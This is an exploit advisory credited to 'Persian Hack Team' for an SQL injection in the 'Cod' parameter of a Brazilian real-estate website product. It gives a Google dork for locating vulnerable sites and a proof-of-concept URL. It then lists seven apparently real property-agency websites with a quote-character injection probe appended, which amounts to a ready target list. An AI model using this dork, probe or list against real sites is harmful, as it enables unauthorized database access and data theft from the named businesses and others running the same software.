######################
# Exploit Title : Imobivale Imóveis Ltda SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.groupsoftware.com.br/produtos/imobiliaria21/visao.aspx?id=1
# Google Dork : inurl:detalhes_imovel.php?Cod=
# Date: 2016/01/27
# Version : 21
######################
# PoC: http://www.casastemporadabonitoms.com.br/detalhes_imovel.php?Cod=[SQLI]
# Demo :
#http://www.casastemporadabonitoms.com.br/detalhes_imovel.php?Cod=56%27
#http://www.nespoliimoveis.com.br/site/detalhes_imovel.php?Cod=162%27
#http://www.consultorregis.com.br/detalhes_imovel.php?Cod=75%27
#http://www.imobivaleimoveis.com.br/detalhes_imovel.php?Cod=225%27
#http://www.watanabeimoveis.com.br/2014/detalhes_imovel.php?Cod=105%27
#http://www.madridimoveisltda.com.br/detalhes_imovel.php?id_imoveis=382%27
#http://www.baroniimoveisemriviera.com.br/detalhes_imovel.php?Cod=144%27
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################